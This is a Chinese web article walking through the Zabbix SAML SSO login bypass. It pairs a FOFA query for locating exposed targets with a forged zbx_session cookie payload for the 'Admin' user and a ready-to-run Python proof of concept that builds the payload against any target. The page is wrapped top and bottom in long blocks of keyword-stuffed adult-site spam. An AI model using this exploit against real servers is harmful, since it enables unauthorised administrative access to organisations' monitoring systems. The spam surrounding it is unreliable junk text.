成人在线亚洲_国产日韩视频一区二区三区_久久久国产精品_99国内精品久久久久久久

您的位置:首頁技術文章
文章詳情頁

Zabbix SAML SSO 登錄繞過漏洞的操作流程

瀏覽:522日期:2023-04-06 15:09:27
目錄
  • 一、簡介
  • 二、FOFA語法
  • 三、復現流程

一、簡介

zabbix是一個基于WEB界面的提供分布式系統監視以及網絡監視功能的企業級的開源解決方案。zabbix能監視各種網絡參數,保證服務器系統的安全運營;并提供靈活的通知機制以讓系統管理員快速定位/解決存在的各種問題。

zabbix server可以通過SNMP,zabbix agent,ping,端口監視等方法提供對遠程服務器/網絡狀態的監視,數據收集等功能,它可以運行在Linux,Solaris,HP-UX,AIX,Free BSD,Open BSD,OS X等平臺上。

該漏洞源于在啟用 saml SSO 身份驗證(非默認)的情況下,未身份驗證的攻擊者可以修改會話數據,成功繞過前臺進入后臺,因為存儲在會話中的用戶登錄未經過驗證。

漏洞的限制條件:需要啟用 SAML 身份驗證,并且攻擊者必須知道 Zabbix 用戶的用戶名。

二、FOFA語法

app=“ZABBIX-監控系統” && body=“SAML”

三、復現流程

1、通過fofa語法搜索zabbix資產訪問首頁獲取set-cookie中zbx_session參數的值

2、通過Url解碼和Base64解碼獲得zbx_session參數Json格式數據

{"sessionid":"67f71355eb96121f384ea0571290faca","sign":"Uyq2BXQfe5Iug4UBpucwq3PXAmVh0ctpR4pvEfzg\/OWe7TKhmAQdqyu5iUmtWzQR+0m33eQBHnk1VV+IO0icAQ=="}

3、通過在Json中添加saml_data和username_attribute參數后重新Base64編碼和Url編碼構造Payload

{"saml_data":{"username_attribute":"Admin"},"sessionid":"67f71355eb96121f384ea0571290faca","sign":"Uyq2BXQfe5Iug4UBpucwq3PXAmVh0ctpR4pvEfzg\/OWe7TKhmAQdqyu5iUmtWzQR+0m33eQBHnk1VV+IO0icAQ=="}

4、把構造好的payload進行base64編碼和url編碼

%65%79%4a%7a%59%57%31%73%58%32%52%68%64%47%45%69%4f%6e%73%69%64%58%4e%6c%63%6d%35%68%62%57%56%66%59%58%52%30%63%6d%6c%69%64%58%52%6c%49%6a%6f%69%51%57%52%74%61%57%34%69%66%53%77%69%63%32%56%7a%63%32%6c%76%62%6d%6c%6b%49%6a%6f%69%4e%6a%64%6d%4e%7a%45%7a%4e%54%56%6c%59%6a%6b%32%4d%54%49%78%5a%6a%4d%34%4e%47%56%68%4d%44%55%33%4d%54%49%35%4d%47%5a%68%59%32%45%69%4c%43%4a%7a%61%57%64%75%49%6a%6f%69%56%58%6c%78%4d%6b%4a%59%55%57%5a%6c%4e%55%6c%31%5a%7a%52%56%51%6e%42%31%59%33%64%78%4d%31%42%59%51%57%31%57%61%44%42%6a%64%48%42%53%4e%48%42%32%52%57%5a%36%5a%31%77%76%54%31%64%6c%4e%31%52%4c%61%47%31%42%55%57%52%78%65%58%55%31%61%56%56%74%64%46%64%36%55%56%49%72%4d%47%30%7a%4d%32%56%52%51%6b%68%75%61%7a%46%57%56%69%74%4a%54%7a%42%70%59%30%46%52%50%54%30%69%66%51%3d%3d

5、請求index_sso.php,在http請求頭中構造payload,將zbx_session的值替換為url編碼后的payload

6、成功登錄后臺

可利用poc直接獲取構造后的payload

poc:

import requestsimport reimport urllib.parseimport base64import jsonimport sys def exp(target, username):	resp = requests.get(url=target, verify=False)	cookie = resp.headers.get("Set-Cookie")	zbx_session = re.findall(r"zbx_session=(.*?); ", cookie)	url_decode_data = urllib.parse.unquote(zbx_session[0], encoding="utf-8")	base64_decode_data = base64.b64decode(url_decode_data)	decode_to_str = str(base64_decode_data, encoding="utf-8")	to_json = json.loads(decode_to_str)	tmp_ojb = dict(saml_data=dict(username_attribute=username), sessionid=to_json["sessionid"], sign=to_json["sign"])	payloadJson = json.dumps(tmp_ojb)	print("decode_payload:", payloadJson)	payload = urllib.parse.quote(base64.b64encode(payloadJson.encode()))	print("zbx_signed_session:", payload)if __name__ == "__main__":	if len(sys.argv) != 3:		print("argv error")		exit(0)	target = sys.argv[1]	username = sys.argv[2]	exp(target, username)

到此這篇關于Zabbix SAML SSO 登錄繞過漏洞的文章就介紹到這了,更多相關Zabbix 登錄繞過漏洞內容請搜索以前的文章或繼續瀏覽下面的相關文章希望大家以后多多支持!

標簽: Zabbix
成人在线亚洲_国产日韩视频一区二区三区_久久久国产精品_99国内精品久久久久久久
欧美一区二区三区喷汁尤物| 久久久av水蜜桃| 91色九色蝌蚪| 懂色av一区二区三区蜜臀 | 三级欧美韩日大片在线看| 精品一区二区三区在线播放视频| 欧美激情资源网| 久久国产精品一区二区三区| 日本精品一区二区三区高清 | 快she精品国产999| 久久精品一区八戒影视| 欧美影院一区| 欧美xxxxx牲另类人与| 另类小说视频一区二区| 美美哒免费高清在线观看视频一区二区 | 丝袜国产日韩另类美女| 亚洲图片欧美视频| 色综合久久天天| 精品一区二区三区不卡| 国产精品理论片在线观看| 亚洲人成亚洲人成在线观看图片| 欧美吻胸吃奶大尺度电影| 欧美日韩国产一区精品一区| 欧美成人精品1314www| 日韩午夜激情电影| 亚洲一区bb| 亚洲成av人片在线观看无码| 成人av在线一区二区| 日韩影院精彩在线| 欧美二区在线观看| 亚洲午夜影视影院在线观看| 噜噜噜噜噜久久久久久91| 91麻豆福利精品推荐| 欧美一区二区精品久久911| 日韩视频在线你懂得| 欧美国产国产综合| 成人av网址在线观看| 另类小说欧美激情| 亚洲mv大片欧洲mv大片精品| 国产精品美女久久久久aⅴ国产馆| 日韩欧美国产三级| 你懂的网址国产 欧美| 欧美一区二区三区成人| 久久亚洲一级片| 国产亚洲精品bv在线观看| 欧美日韩高清在线播放| 日产精品久久久久久久性色| 一区二区三国产精华液| 五月天中文字幕一区二区| 国产成人精品免费| 欧美男人的天堂一二区| 国产精品久久久对白| 麻豆精品91| 久久99国产精品尤物| 亚洲自啪免费| 亚洲日本va午夜在线电影| 久久国产精品99精品国产| 亚洲线精品一区二区三区| 亚洲丰满少妇videoshd| 捆绑变态av一区二区三区| 欧美视频自拍偷拍| 亚洲不卡av一区二区三区| av成人毛片| 夜夜精品视频| 91视频精品在这里| 日本韩国一区二区三区视频| 99久免费精品视频在线观看| 精品乱人伦一区二区三区| 亚洲欧美影院| 国产日韩精品一区二区三区| 亚洲精品一二| 国产不卡在线视频| 欧美日韩一区二区三区四区在线观看| 国产一区二区三区蝌蚪| 色综合天天视频在线观看| 欧美日本亚洲| 亚洲午夜羞羞片| 一区二区三区毛片| 亚洲精品乱码久久久久| 一本一本大道香蕉久在线精品 | 久久青草欧美一区二区三区| 亚洲精品在线三区| 欧美白人最猛性xxxxx69交| 狠狠久久亚洲欧美| 99国产麻豆精品| 国产精品色在线| 亚洲精品在线免费观看视频| 亚洲精品日本| 99re热这里只有精品视频| 99久久精品国产网站| 国产精品大片免费观看| 美女尤物国产一区| 欧美久久电影| 国产精品亚洲成人| 国产一区美女| 亚洲444eee在线观看| 6080亚洲精品一区二区| av一本久道久久综合久久鬼色| 成人一级黄色片| 成人国产精品免费观看视频| www.亚洲国产| 国产精品福利一区二区三区| 久久先锋影音| 国产视频久久| 极品少妇一区二区| 国产精品日日摸夜夜摸av| 久久成人免费| 久久综合亚州| 精品电影一区二区三区| 欧美色图片你懂的| 日本成人在线电影网| 美女任你摸久久| 国产日韩欧美一区在线| 精品视频1区2区| 麻豆免费看一区二区三区| 国产99久久久国产精品免费看| 亚洲成人av中文| 中文字幕视频一区| 国产一区日韩二区欧美三区| 久久精品国产亚洲5555| 欧美日韩喷水| 欧美日韩精品一区视频| 亚洲免费久久| 合欧美一区二区三区| 久久精品99国产国产精| caoporn国产一区二区| 奇米影视一区二区三区小说| 最近看过的日韩成人| 国产精品一品二品| 青娱乐精品视频| 99久久免费精品高清特色大片| 久久久精品免费观看| 亚洲欧美在线aaa| 中文字幕一区二区三区色视频 | 日韩视频免费直播| 成人av综合在线| 国产精品中文字幕日韩精品| 成人一区二区三区在线观看| 男人的j进女人的j一区| 久久成人羞羞网站| 国产精品一区二区久激情瑜伽| 一区二区三区福利| 亚洲国产精品传媒在线观看| 亚洲激情视频| 亚洲欧美一区二区三区久本道91| 一区二区三区高清| 亚洲一级电影视频| 激情视频一区| 中文字幕乱码久久午夜不卡| 精品国产一区二区精华| 国产欧美一区二区三区国产幕精品| 午夜在线a亚洲v天堂网2018| 欧美激情一区二区三区四区| 风流少妇一区二区| 1024日韩| 国产一区二区三区无遮挡| 欧美日韩一区二区欧美激情| 精品一区二区免费在线观看| 精品成人免费观看| 亚洲国产三级| 一级中文字幕一区二区| 国内国产精品久久| 欧美88av| 欧美系列在线观看| 国产日产亚洲精品系列| 另类人妖一区二区av| 日韩欧美视频一区| 欧美日本亚洲韩国国产| 免费美女久久99| 欧美视频一区| 久久性色av| 精品国产青草久久久久福利| 亚洲一级不卡视频| 蜜臀国产一区二区三区在线播放| 激情综合色播五月| 91视视频在线直接观看在线看网页在线看 | 精品亚洲porn| 成人一区在线看| 久久精品免视看| 黄色免费成人| 精品亚洲欧美一区| 国产精品久久久久久妇女6080| 欧美日韩一区二区在线视频| 亚洲午夜精品久久久久久app| 69堂国产成人免费视频| 亚洲欧美日韩小说| 狠久久av成人天堂| 久久只精品国产| 一本一道久久a久久精品| 国产高清成人在线| 伊人夜夜躁av伊人久久| 久久综合狠狠综合久久激情| 在线观看www91| 亚洲三级影院| 精品日韩欧美在线| 视频一区二区三区在线| 亚洲免费大片| 久久品道一品道久久精品| 蜜桃视频免费观看一区| 亚洲无线观看|